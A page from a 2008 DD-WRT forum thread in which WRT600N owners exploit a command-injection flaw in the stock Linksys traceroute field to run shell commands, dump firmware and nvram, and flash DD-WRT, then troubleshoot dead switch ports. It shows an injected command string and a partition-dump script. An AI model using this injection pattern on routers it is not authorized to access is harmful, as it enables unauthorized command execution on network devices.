WRT600N tracert exploit with stock Linksys firmware

Post new topic   Reply to topic    DD-WRT Forum Forum Index -> Broadcom SoC based Hardware
Goto page Previous  1, 2, 3 ... 6, 7, 8 ... 19, 20, 21  Next
Author Message
Transient
DD-WRT User


Joined: 16 Jun 2006
Posts: 91

PostPosted: Tue Apr 22, 2008 18:39    Post subject: Reply with quote
shurik wrote:
unfortunately the same effect: empty files. this time tried both mtd and mtdblock folders. any more ideas on how to backup firmware?


I think I understand the problem. It's because we're exploiting the traceroute command we end up with the router running this:

Code:
traceroute 192.168.1.1;cat /dev/mtd/1 > /tmp/memstick/host0_part1/test/firmware.trx > /tmp/tracert.txt


Which isn't what we want.

So let's make a script instead. Save this as dumpfw.sh on your memory stick:

Code:
#!/bin/sh
cat /dev/mtd/1 > /tmp/memstick/host0_part1/test/firmware.trx
cat /dev/mtd/3 > /tmp/memstick/host0_part1/test/nvram.bin


Give it execute permission:

Code:
chmod 755 /tmp/memstick/host0_part1/test/dumpfw.sh


And then run it on the router:

Code:
/tmp/memstick/host0_part1/test/dumpfw.sh


Wait a minute or so as the dumping process is slow.
Sponsor
Transient
DD-WRT User


Joined: 16 Jun 2006
Posts: 91

PostPosted: Tue Apr 22, 2008 18:43    Post subject: Reply with quote
After thinking about it a bit more, the chmod part probably isn't necessary (although it won't hurt).

All files on my memory stick have full read/write/execute permissions already.
shurik
DD-WRT User


Joined: 17 Feb 2008
Posts: 52

PostPosted: Tue Apr 22, 2008 19:32    Post subject: Reply with quote
Transient wrote:
shurik wrote:
unfortunately the same effect: empty files. this time tried both mtd and mtdblock folders. any more ideas on how to backup firmware?


I think I understand the problem. It's because we're exploiting the traceroute command we end up with the router running this:

Code:
traceroute 192.168.1.1;cat /dev/mtd/1 > /tmp/memstick/host0_part1/test/firmware.trx > /tmp/tracert.txt


Which isn't what we want.

So let's make a script instead. Save this as dumpfw.sh on your memory stick:

Code:
#!/bin/sh
cat /dev/mtd/1 > /tmp/memstick/host0_part1/test/firmware.trx
cat /dev/mtd/3 > /tmp/memstick/host0_part1/test/nvram.bin


Give it execute permission:

Code:
chmod 755 /tmp/memstick/host0_part1/test/dumpfw.sh


And then run it on the router:

Code:
/tmp/memstick/host0_part1/test/dumpfw.sh


Wait a minute or so as the dumping process is slow.


attached is the result. Can you see if the dump is indeed complete?



WRT600N v1.01.35 build 5.zip
 Description:
WRT600N 1.01.35 build 5 Stock firmware
Manufactured 01/2008
MNR0008106845

Download
 Filename:  WRT600N v1.01.35 build 5.zip
 Filesize:  7.45 MB
 Downloaded:  804 Time(s)

nightwalk
DD-WRT Novice


Joined: 13 Apr 2008
Posts: 23

PostPosted: Tue Apr 22, 2008 20:20    Post subject: Reply with quote
i dont think the build 5 flashdump is usefull as we need the build 3 1.01.36 flashdump at the time being...anyone gonna post it perhaps/
shaddie
DD-WRT Novice


Joined: 14 Apr 2008
Posts: 10

PostPosted: Tue Apr 22, 2008 20:20    Post subject: Flashed Reply with quote
The little javascript exploit worked perfectly.

I chose the route of installing that telnet daemon via usb key. Just find your path using the storage option on the actual linksys firmware. It will be something like host0_part1. Just substitute that into the command he gives.

I was actually about to give up on flashing it until I found that. It made things considerably easier.

Thanks to the poster, Transient. It worked perfectly, but now i'm in the same boat as several others with non-functional switchports. Hopefully a more recent firmware will fix it :D

Also the telnet thing works pretty well, and even responds with CRC OK and stuff whenever you update the firmware.
Transient
DD-WRT User


Joined: 16 Jun 2006
Posts: 91

PostPosted: Tue Apr 22, 2008 20:31    Post subject: Reply with quote
nightwalk wrote:
i dont think the build 5 flashdump is usefull as we need the build 3 1.01.36 flashdump at the time being...anyone gonna post it perhaps/


Well it's usefull if you want to return to the official Linksys firmware (and regain ethernet ports) since this version isn't posted on Linksys's website.

It would be nice if someone would post 1.01.36 build 3 though!
Transient
DD-WRT User


Joined: 16 Jun 2006
Posts: 91

PostPosted: Tue Apr 22, 2008 20:35    Post subject: Re: Flashed Reply with quote
shaddie wrote:
The little javascript exploit worked perfectly.

I chose the route of installing that telnet daemon via usb key. Just find your path using the storage option on the actual linksys firmware. It will be something like host0_part1. Just substitute that into the command he gives.

I was actually about to give up on flashing it until I found that. It made things considerably easier.

Thanks to the poster, Transient. It worked perfectly, but now i'm in the same boat as several others with non-functional switchports. Hopefully a more recent firmware will fix it :D

Also the telnet thing works pretty well, and even responds with CRC OK and stuff whenever you update the firmware.


I'm glad to hear it helped! I'm embarassed to say that I spent about 4 hours trying to "fix" it until I realized the problem was simply that every command must end with a ; Embarassed
shaddie
DD-WRT Novice


Joined: 14 Apr 2008
Posts: 10

PostPosted: Tue Apr 22, 2008 20:52    Post subject: Reply with quote
Once I got to the console it was all smooth for me Very Happy.

Took like 5-10 minutes once in ddwrt!

I kept thinking I did it when I would try the other approaches. Watch the progress bar for 5 minutes. Reboot. Still build 5 lol hah. I'm sure I was just fat-fingering it someplace .. but console ftw.

I'd say your way is by far the simplest approach. There's almost no trial and error and you get responses.

Once I figure out what's up with the switchports I feel things will be much better ^_^.
Transient
DD-WRT User


Joined: 16 Jun 2006
Posts: 91

PostPosted: Tue Apr 22, 2008 21:27    Post subject: Reply with quote
shurik wrote:
attached is the result. Can you see if the dump is indeed complete?


Good news! I was able to successfully extract your "build 5" firmware trx using firmware_mod_kit.
alankligman
DD-WRT Novice


Joined: 21 Apr 2008
Posts: 9

PostPosted: Tue Apr 22, 2008 21:38    Post subject: Reply with quote
shaddie wrote:
Once I got to the console it was all smooth for me Very Happy.

Took like 5-10 minutes once in ddwrt!

I kept thinking I did it when I would try the other approaches. Watch the progress bar for 5 minutes. Reboot. Still build 5 lol hah. I'm sure I was just fat-fingering it someplace .. but console ftw.

I'd say your way is by far the simplest approach. There's almost no trial and error and you get responses.

Once I figure out what's up with the switchports I feel things will be much better ^_^.


I spent some time on this yesterday but I didn't make much progress. The router is seeing traffic on the switch ports, but it's not being handled. It doesn't feel like a driver issue, though...
shurik
DD-WRT User


Joined: 17 Feb 2008
Posts: 52

PostPosted: Tue Apr 22, 2008 21:53    Post subject: Reply with quote
Transient wrote:
shurik wrote:
attached is the result. Can you see if the dump is indeed complete?


Good news! I was able to successfully extract your "build 5" firmware trx using firmware_mod_kit.


Glad to be of help to all who were stuck with dd-wrt and no LAN ports. I will wait with my own experiments until the bug is fixed.
shaddie
DD-WRT Novice


Joined: 14 Apr 2008
Posts: 10

PostPosted: Tue Apr 22, 2008 22:14    Post subject: Reply with quote
alankligman, I'll be home in a little bit to test it more.

I recall there being link lights. I agree about it not being a driver issue, especially if there is data. It *seems* like you wouldn't even get any kind of link without functional drivers. I don't know much about drivers and DDWRT though :/

We'll just have to see!
Transient
DD-WRT User


Joined: 16 Jun 2006
Posts: 91

PostPosted: Tue Apr 22, 2008 22:31    Post subject: Reply with quote
shaddie wrote:
alankligman, I'll be home in a little bit to test it more.

I recall there being link lights. I agree about it not being a driver issue, especially if there is data. It *seems* like you wouldn't even get any kind of link without functional drivers. I don't know much about drivers and DDWRT though :/

We'll just have to see!


Perhaps it's the vlan port bindings? I'd try playing with vlan0ports and vlan1ports. On mine CPU is port 8, maybe on yours (and others with non-functional ports) it is different.

http://www.dd-wrt.com/wiki/index.php/Switched_Ports
alankligman
DD-WRT Novice


Joined: 21 Apr 2008
Posts: 9

PostPosted: Tue Apr 22, 2008 23:50    Post subject: Reply with quote
Transient wrote:
shaddie wrote:
alankligman, I'll be home in a little bit to test it more.

I recall there being link lights. I agree about it not being a driver issue, especially if there is data. It *seems* like you wouldn't even get any kind of link without functional drivers. I don't know much about drivers and DDWRT though :/

We'll just have to see!


Perhaps it's the vlan port bindings? I'd try playing with vlan0ports and vlan1ports. On mine CPU is port 8, maybe on yours (and others with non-functional ports) it is different.

http://www.dd-wrt.com/wiki/index.php/Switched_Ports


My router is showing "vlan0ports=1 2 3 4 8*" and "vlan2ports=0 8*". No value for vlan1ports is set.
MaZe
DD-WRT Novice


Joined: 23 Apr 2008
Posts: 14

PostPosted: Wed Apr 23, 2008 2:12    Post subject: Reply with quote
1.01.36 build 3 mtdblock/{0,1,2} in attachment
(since 3,4 seem to contain nvram settings/password/mac adresses, etc)



mtdblock-2.bin
 Description:
WRT600N 1.01.36 build 3 mtdblock/2 extract

Download
 Filename:  mtdblock-2.bin
 Filesize:  6.63 MB
 Downloaded:  701 Time(s)


mtdblock-1.bin
 Description:
WRT600N 1.01.36 build 3 mtdblock/1 extract

Download
 Filename:  mtdblock-1.bin
 Filesize:  7.63 MB
 Downloaded:  739 Time(s)


mtdblock-0.bin
 Description:
WRT600N 1.01.36 build 3 mtdblock/0 extract

Download
 Filename:  mtdblock-0.bin
 Filesize:  256 KB
 Downloaded:  682 Time(s)

Goto page Previous  1, 2, 3 ... 6, 7, 8 ... 19, 20, 21  Next Display posts from previous:    Page 7 of 21
Post new topic   Reply to topic    DD-WRT Forum Forum Index -> Broadcom SoC based Hardware All times are GMT

Navigation

 
Jump to:  
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
You can attach files in this forum
You can download files in this forum